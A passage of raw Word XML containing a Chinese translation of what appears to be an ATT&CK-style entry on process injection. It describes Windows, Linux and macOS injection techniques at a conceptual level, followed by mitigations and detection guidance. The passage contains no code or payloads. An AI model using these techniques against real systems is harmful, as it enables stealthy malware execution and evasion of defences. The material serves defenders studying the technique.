          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新映射内存引用。这种方法的变体，如反射式动态链接库注入（将自映射动态链接库写入进程）和内存模块（写入进程时映射动态链接库），解决了地址重定位问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5475A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程执行劫持涉及将恶意代码或动态链接库路径注入到进程的线程。与进程替换类似，线程必须先挂起。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EF23A3" w14:textId="1D6D941D" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（异步过程调用）注入涉及将恶意代码附加到进程线程的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队列。排队的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>APC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数在线程进入可变状态时执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>APC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的一个变体，“</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>Early Bird</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入”，涉及创建一个挂起的进程，该进程中的恶意代码可以在进程的入口点（以及随后可能会有的防恶意软件</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）之前通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入和执行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>AtomBombing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是另一种变体，它利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>APC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用先前写入全局</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>atom</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表的恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B36D2D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（线程本地存储）回调注入涉及操控</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中的指针，从而在到达代码的合法入口点之前将进程重定向到恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01429B62" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Mac and Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FB107" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS X/MacOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统中有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>如下实现方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53473CC0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LD_PRELOAD, LD_LIBRARY_PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DYLD_INSERT_LIBRARIES</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>Mac OS X</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dlfcn </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>进程中</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态加载库（共享对象），拦截运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF263A5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ptrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统调用将代码附加到正在运行的进程并在运行时对其修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E59F3C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/proc/[pid]/mem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>进程内存访问权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入任意数据。由于其复杂性，这种技术非常罕见。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1AA905" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>VDSO</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过操控从</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux-vdso.so</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共享对象映射进来的代码存根，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:t>ELF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件运行时执行注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D3180E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件通常利用进程注入来访问系统资源，通过这些资源获得持久性和其他环境修改。更复杂的样本可以使用命名管道或其他进程间通信（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ipc</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）机制作为通信信道来执行多个进程注入，从而</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>对模块进行分区</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并进一步规避检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EB902" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00B245BB" w14:paraId="2FA1A05A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="181C7F76" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="18527D67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="07C0666F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66915E8E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>端点上</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>行为预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E560D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>某些端点安全解决方案，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>使其</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>基于注入过程中发生行为的常见序列来阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>某些类型的进程注入。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6DA415AA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B265376" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="085CDD57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>inux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统中，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Yama</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来减少基于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ptrace</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的进程注入，方法是将</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ptrace</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的使用仅限于特权用户。也可以</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>使用其他缓解措施，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>比如部署安全内核模块来提供高级访问控制和进程限制，如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SELinux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>grsecurity</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>AppAmour</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AE00A67" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFBDDC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C77ABED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控各种类型代码注入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用可能会生成大量数据而且可能无法直接用于防御</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除非是在特定情况下为已知的错误调用序列收集数据。因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用往往是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>善意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，很难与恶意行为区分开来。注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>过程中可能会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>CreateRemoteThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SuspendThread/SetThreadContext/ResumeThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>QueueUserAPC/NtQueueApcThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>WriteProcessMemory</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其它进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>内存</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B8960" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于特殊性，监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
